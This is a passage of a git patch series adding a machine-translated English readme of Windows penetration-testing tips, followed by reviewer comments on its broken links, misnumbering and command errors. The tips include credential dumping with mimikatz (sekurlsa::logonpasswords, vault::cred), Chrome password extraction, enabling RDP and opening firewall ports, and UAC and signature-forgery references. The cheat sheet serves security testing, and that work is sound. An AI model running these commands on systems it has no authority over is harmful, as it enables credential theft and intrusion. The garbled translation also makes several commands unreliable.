(https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7% A7-Token%E7%AA%83%E5%8F%96%E4%B8%8E%E5%88%A9%E7%94%A8/) + +--- + +### Tips 45 3389 Remote Connection + +#### 1. 
Query whether the system allows 3389 remote connection: + +`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections` + +1 means closed, 0 means open + +View the port of the remote connection: + +`REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber` + +#### 2, the method of opening 3389 remote connection + +Method 1: Pass cmd + +``` +REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f +REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f +``` + +Method 2: Pass the reg file + +The content is as follows: + +``` +Windows Registry Editor Version 5.00 +[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] +"fDenyTSConnections"=dword:00000000 +[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] +"PortNumber"=dword:00000d3d +``` + +Import the registry: + +`regedit /s a.reg` + +**Note:** + +Modify the connection port to take effect after restarting + +**supplement** + +If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows: + +`netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow` + +#### 3, remote connection method + +Kali uses 3389 remote connection: + +`rdesktop 192.168.1.1:3389` + +Windows: + +`mstsc.exe` + +Non-server version of Windows, only one account is allowed to log in by default + +The specific performance is: + +When logging in remotely, using the same account as the original system, the original system will be switched to the login interface. 
+ +Using a different account, the original system desktop will prompt you to disconnect the current connection (default selection after 30 seconds) + +**Solution:** + +Use mimikatz.exe to execute `ts::multirdp` to allow multiple users to log in remotely + +The ability to achieve remote login of different accounts does not conflict, the original system desktop will not prompt the box + +Of course, using the same account as the original system, the original system will still be switched to the login interface. + +**Note:** + +This method fails after the system restarts. The next time you use it, you need to re-execute the command `ts::multirdp`. + +Can also be permanently modified by modifying the file termsrv.dll + +reference: + +["Infiltration Techniques - Multi-User Login for Windows System Remote Desktop"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A% 80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E6%A1%8C%E9%9D%A2%E7%9A% 84%E5%A4%9A%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95/) + +--- + +### Tips 46 Using netsh to modify firewall rules for remote systems + +The remote system needs to allow the Windows Firewall to remotely manage. The open command is as follows: + +Netsh advfirewall set currentprofile settings remotemanagement enable + +Eg. + +``` +Netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow +``` + +reference: + +["Domain Penetration - Using DCOM to Execute Programs in Remote Systems"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F -%E5%88%A9%E7%94%A8DCOM%E5%9C%A8%E8%BF%9C%E7%A8%8B%E7%B3%BB%E7%BB%9F%E6%89%A7% E8%A1%8C%E7%A8%8B%E5%BA%8F/) + +--- + +### Tips 47 Hijacking UAC + +When the UAC prompt box is popped up, execute arbitrary code, and insert the payload by modifying the function of the registry hijacking signature verification. 
+ +reference: + +[Authenticode Signature Forgery - Signature Forgery and Signature Verification Hijacking of PE Files] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4 %BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9 %80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81/) + +--- + +### Tips 48 Authenticode signature forgery of PE files + +By modifying the registry, you can add a Microsoft certificate to the PE file. + +reference: + +[Authenticode Signature Forgery - Signature Forgery and Signature Verification Hijacking of PE Files] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4 %BC%AA%E9%80%A0-PE%E6%96%87%E4%BB%B6%E7%9A%84%E7%AD%BE%E5%90%8D%E4%BC%AA%E9 %80%A0%E4%B8%8E%E7%AD%BE%E5%90%8D%E9%AA%8C%E8%AF%81%E5%8A%AB%E6%8C%81/) + +["Authenticode Signature Forgery - Signature Forgery for File Types"] (https://3gstudent.github.io/3gstudent.github.io/Authenticode%E7%AD%BE%E5%90%8D%E4%BC% AA%E9%80%A0-%E9%92%88%E5%AF%B9%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%9A%84 %E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/) + +--- + +### Tips 49 Catalog signature forgery of PE files + +Construct Long UNC file name, implement file name spoofing, get Catalog signature + +reference: + +[Catalog Signature Forgery - Long UNC Filename Deception] (https://3gstudent.github.io/3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA %E9%80%A0-Long-UNC%E6%96%87%E4%BB%B6%E5%90%8D%E6%AC%BA%E9%AA%97/) + +--- + +### Tips 50 mklink + +Used to create symbolic links, which can be understood as shortcuts + +Create the directory c:\test\1, point to c:\temp, and use the following actions: + +(1) Create a link with the /D parameter command: + +Mklink /D "c:\test\1" "c:\Temp" + +(2) Create a join using the /J parameter command: + +Mklink /J "c:\test\1" "c:\Temp" + +difference: + +The link created with the /D parameter has more "file shortcuts" for file attributes. 
+ +Use /J does not require administrator privileges + +Use /D requires administrator privileges + +**application:** + +Change the path to the released file + +--- + +### Tips 51 powershell passes parameters when executing scripts + +``` +Powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts" + +Powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords""""" +``` + +--- + +### Tips 52 dll injection method + +#### 1, APC + +reference: + +["Dll injection through APC - bypassing Sysmon monitoring"] (https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87APC%E5%AE%9E %E7%8E%B0Dll%E6%B3%A8%E5%85%A5-%E7%BB%95%E8%BF%87Sysmon%E7%9B%91%E6%8E%A7/) + +#### 2, process hollowing + +reference: + +["Implementation and Testing of the Process"] (https://3gstudent.github.io/3gstudent.github.io/%E5%82%80%E5%84%A1%E8%BF%9B%E7%A8% 8B%E7%9A%84%E5%AE%9E%E7%8E%B0%E4%B8%8E%E6%A3%80%E6%B5%8B/) + +#### 3, Process Doppelgänging + +reference: + +["Introduction to Process Doppelganging"] (https://3gstudent.github.io/3gstudent.github.io/Process-Doppelganging%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB %8D/) + +--- + +### Tips 53 Default shared directory in the domain + +``` +\\\SYSVOL\\ +``` + +All hosts in the domain can access, which saves group policy related data, including login script configuration files, etc. + +reference: + +["Domain Penetration - Using SYSVOL to Restore Passwords Saved in Group Policy"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80 %8F-%E5%88%A9%E7%94%A8SYSVOL%E8%BF%98%E5%8E%9F%E7%BB%84%E7%AD%96%E7%95%A5%E4%B8% AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/) + +--- + +### Tips 54 Your TeamViewer may be backed up + +If your TeamViewer version is `13.0.5058`, don't feel free to connect to an unknown TeamViewer server, it may be backed up. 
+ +reference: + +["Privacy Vulnerability Test in TeamViewer 13.0.5058"] (https://3gstudent.github.io/3gstudent.github.io/TeamViewer-13.0.5058%E4%B8%AD%E7%9A%84%E6% 9D%83%E9%99%90%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95/) + +--- + +### Tips 55 Remotely view domain-related login and logout related logs: + +#### method 1: + +``` +Wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624 and 4623 and 4672]" /r:dc1 /u:administrator /p:password +``` + +#### Method 2: + +(Not recommended, direct download file is too large) + +Obtain the domain control file: `C:\Windows\System32\winevt\Logs\Security.evtx`, filter event 4624/4623/4672 + +--- + +### Tips 56 Determine if the current system is in standby mode. + +The function return value of GetForegroundWindow() in the lock screen state is NULL, and the return value of GetForegroundWindow() function in non-lock screen state is a non-zero value. + +reference: + +Https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen + +Powershell script implementation: + +https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1 + +--- + +### Tips 57 Get the current system user no input time + +Judge through API GetIdleTime + +c# implementation: + +https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C + +Powershell script implementation: + +https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1 + +--- + +### Tips 58 Determine the screen saver startup time of the current system + +Determine whether to open the screen saver: + +Find the registry `HKEY_CURRENT_USER\Control Panel\Desktop`, if there is a key value `SCRNSAVE.EXE` + +``` +REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE +``` + +If the screen saver is turned on, check the key value `ScreenSaveTimeOut` to get the screen saver startup time (in seconds). 
+ +``` +REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut +``` + +--- + +### Tips 59 Hide the interface of the specified process + +Change window state via API ShowWindowAsync + +Through powershell implementation, the script can refer to: + +https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1 + +--- + +### Tips 60 Screen capture of Windows system via Powershell + +Script download address: + +https://gallery.technet.microsoft.com/scriptcenter/eeff544a-f690-4f6b-a586-11eea6fc5eb8/file/50729/1/Take-ScreenShot.ps1 + +--- + +### Tips 61 View the programs currently installed on Windows systems + +Obtained by enumerating the registry keys HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall + +**Note:** + +The directory of the 32-bit program under the 64-bit system is `HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall` + +The reference address of the powershell script implementation: + +https://github.com/3gstudent/ListInstalledPrograms + +--- + +### Tips 62 Get the current system type via wmi + +``` +wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list +``` + +|Value|Meaning| +| - | - | +|0 (0x0) |Unspecified| +|1 (0x1) |Desktop| +|2 (0x2) |Mobile| +|3 (0x3) |Workstation| +|4 (0x4) |Enterprise Server| +|5 (0x5) |Small Office and Home Office (SOHO) Server| +|6 (0x6) |Appliance PC| +|7 (0x7) |Performance Server| +|8 (0x8) |Maximum| + + + +--- + +### Tips 63 Export the password saved by the Chrome browser: + +#### 1, online access + +method 1: + +Read the database file `%LocalAppData%\Google\Chrome\User Data\Default\Login Data`. If the Chrome browser is running and cannot be read directly, you need to copy it first. 
+ +Direct decryption in the current system call API CryptUnprotectData + +Method 2: + +Mimikatz + +``` +Vault::cred +``` +reference: + +["Infiltration Techniques - Exporting Passwords Saved in Chrome"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A% 80%E5%B7%A7-%E5%AF%BC%E5%87%BAChrome%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D %E5%AD%98%E7%9A%84%E5%AF%86%E7%A0%81/) + +#### 2, offline access + +You do not need to obtain the user's plain text password when using the Master Key. + +reference: + +["Infiltration Techniques - Using Masterkey to Export Passwords Stored in Chrome Browser"] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6 %8A%80%E5%B7%A7-%E5%88%A9%E7%94%A8Masterkey%E7%A6%BB%E7%BA%BF%E5%AF%BC%E5%87%BAChrome%E6% B5%8F%E8%A7%88%E5%99%A8%E4%B8%AD%E4%BF%9D%E5%AD%98%E7%9A%84%E5%AF%86%E7%A0% 81/) + + +--- + +### Tips 65 Get the history file of the system through ShadowCopy + +Query whether the current system has a snapshot: + +``` +Vssadmin list shadows +``` + +Access the files in the history snapshot: + +``` +Mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\ +Dir c:\testvsc +``` + +reference: + +["Domain Penetration - Obtain NTDS.dit File for Domain Control Server"] (https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80 %8F-%E8%8E%B7%E5%BE%97%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%9A% 84NTDS.dit%E6%96%87%E4%BB%B6/) + +--- + +### Tips 64 How to execute multiple commands on the command line + +``` +Aa && bb +``` + +Execute aa, and then execute bb after success. + +``` +Aa || bb +``` + +Execute aa first. If the execution is successful, bb is no longer executed. If it fails, bb is executed again. 
+ +``` +Aa & bb +``` + +Execute aa first and then bb, regardless of whether aa is successful + + +--- + +### Tips 65 Sending mail via powershell (with attachments) + +Two methods, the code can refer to: + +https://github.com/3gstudent/SendMail-with-Attachments + +--- + +### Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell + +The default read registry can only get the registry information of the currently logged in user. You can get the registry configuration of the unlogged in user by loading the configuration unit with `reg load`. + +The code can refer to: + +https://github.com/3gstudent/ListInstalledPrograms + +reference: + + [Infiltration Techniques - Obtaining Remote Desktop Connection History for Windows Systems] (https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A %80%E5%B7%A7-%E8%8E%B7%E5%BE%97Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E8%BF%9C%E7%A8% 8B%E6%A1%8C%E9%9D%A2%E8%BF%9E%E6%8E%A5%E5%8E%86%E5%8F%B2%E8%AE%B0%E5%BD%95/ ) + +--- + +### Tips 67 Using pscp to upload files from Windows to Linux via the command line + +download link: + +Https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html + +The upload command is as follows: + +``` +Pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/ +``` + +Will prompt whether to store the cache file + +Enter `Y`, create a new key in the registry: `HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys`, do not need to enter `Y` again for the next connection. + +Enter `N`, do not save the registry key + +Implement the method of automatically entering the `N` command: + +``` +Echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/ +``` + +--- + +### Tips 68 Enumeration of Windows System Handles + +- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method. +- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation. 
+- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used. + +Note: + +- WinXP and Win7, ObjectTypeNumber = 0x1c +- Win8 and later, ObjectTypeNumber = 0x1e + +--- + +### Tips 69 Windows command line uses rar compressed file + +Https://github.com/3gstudent/test/raw/master/rar.exe + +Maximum compression ratio: + +``` +Rar.exe a -m5 1.rar 1.txt +``` + +Volume compression, one compression package per 10MB: + +``` +rar.exe a -m5 -v10m 1.rar 1.txt +``` + +--- + +### Tips 70 + From 55a39a56d9cfe8c430cf7db7f1ab6561decde16f Mon Sep 17 00:00:00 2001 From: "whitesource-bolt-for-github[bot]" Date: Thu, 23 May 2019 07:34:53 +0000 Subject: [PATCH 5/6] Initial WhiteSource configuration file --- .whitesource | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 .whitesource diff --git a/.whitesource b/.whitesource new file mode 100644 index 0000000..f056952 --- /dev/null +++ b/.whitesource @@ -0,0 +1,8 @@ +{ + "generalSettings": { + "shouldScanRepo": true + }, + "checkRunSettings": { + "vulnerableCheckRunConclusionLevel": "failure" + } +} \ No newline at end of file From bf5060b7be0979ed1a3a0f1e8cdd6ef3c45f5d16 Mon Sep 17 00:00:00 2001 From: Pratik Raj Date: Thu, 11 Jul 2019 22:36:54 +0530 Subject: [PATCH 6/6] Delete .whitesource --- .whitesource | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 .whitesource diff --git a/.whitesource b/.whitesource deleted file mode 100644 index f056952..0000000 --- a/.whitesource +++ /dev/null @@ -1,8 +0,0 @@ -{ - "generalSettings": { - "shouldScanRepo": true - }, - "checkRunSettings": { - "vulnerableCheckRunConclusionLevel": "failure" - } -} \ No newline at end of file
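Review bot: none of the reference links in the readme-eng.md hunk will render, because the machine translation inserted a space between `]` and `(` and broke the percent-encoded paths with stray spaces (e.g. `[Catalog Signature Forgery - Long UNC Filename Deception] (https://3gstudent.github.io/3gstudent.github.io/Catalog%E7%AD%BE%E5%90%8D%E4%BC%AA %E9%80%A0-Long-UNC...`); every reference needs to be `[text](url)` with the URL copied byte-for-byte from the Chinese readme rather than passed through the translator. The same artifact capitalised the first word of most commands (`Mklink /D "c:\test\1" "c:\Temp"`, `Vssadmin list shadows`, `Vault::cred`, `Pscp.exe -l root`, `Echo n |pscp.exe`, `Https://github.com/3gstudent/test/raw/master/rar.exe`); lowercase them, since readers will paste them and `Https://` is not recognised as a link. Numbering is out of order and duplicated (Tips 63, then Tips 65 for ShadowCopy, then Tips 64, then a second Tips 65 for sending mail) and the hunk ends on an empty `### Tips 70` heading. Content slips to fix while retranslating: Tips 53's `\\\SYSVOL\\` has lost the domain-name placeholder between the leading backslashes; Tips 50's "Create a join" should read "junction" for `/J`; Tips 64's `||` text should say bb is executed, not "executed again"; and Tips 66 links the same `3gstudent/ListInstalledPrograms` repository as Tips 61 instead of a remote-desktop-history script, which looks like a copy-paste error. There is also a logic problem in the Tips 55 query, `/q:"*[system/eventid=4624 and 4623 and 4672]"`: in XPath the bare numbers 4623 and 4672 are always true, so the filter reduces to EventID=4624 at best, and the element names are case-sensitive (`System`, `EventID`); it should be written as `*[System[(EventID=4624 or EventID=4634 or EventID=4672)]]`, with 4634 being the logoff event the heading asks for (verify whether 4623 was intended). Finally, Tips 67 passes the password on the command line (`-pw toor`), where it is visible in process listings and shell history, and `echo n |` suppresses host-key caching rather than verifying the host; a sentence saying so would help readers who copy it.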
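Review bot: the bot-generated `.whitesource` in PATCH 5/6 sets `"vulnerableCheckRunConclusionLevel": "failure"`, which turns the WhiteSource check into a blocking failure on a repository that consists of markdown tips and has no dependency manifest to scan, so the check can only ever block for nothing or pass vacuously; either drop the bot configuration or use the non-blocking conclusion level, and add the missing trailing newline flagged by `\ No newline at end of file`.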
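Review bot: PATCH 6/6 is a straight revert of PATCH 5/6 within the same series, so the series carries an add-then-delete pair that leaves the tree unchanged; squash the two commits before merging, and if the removal is meant to stand on its own, the commit message should say why the scan configuration was dropped rather than just "Delete .whitesource".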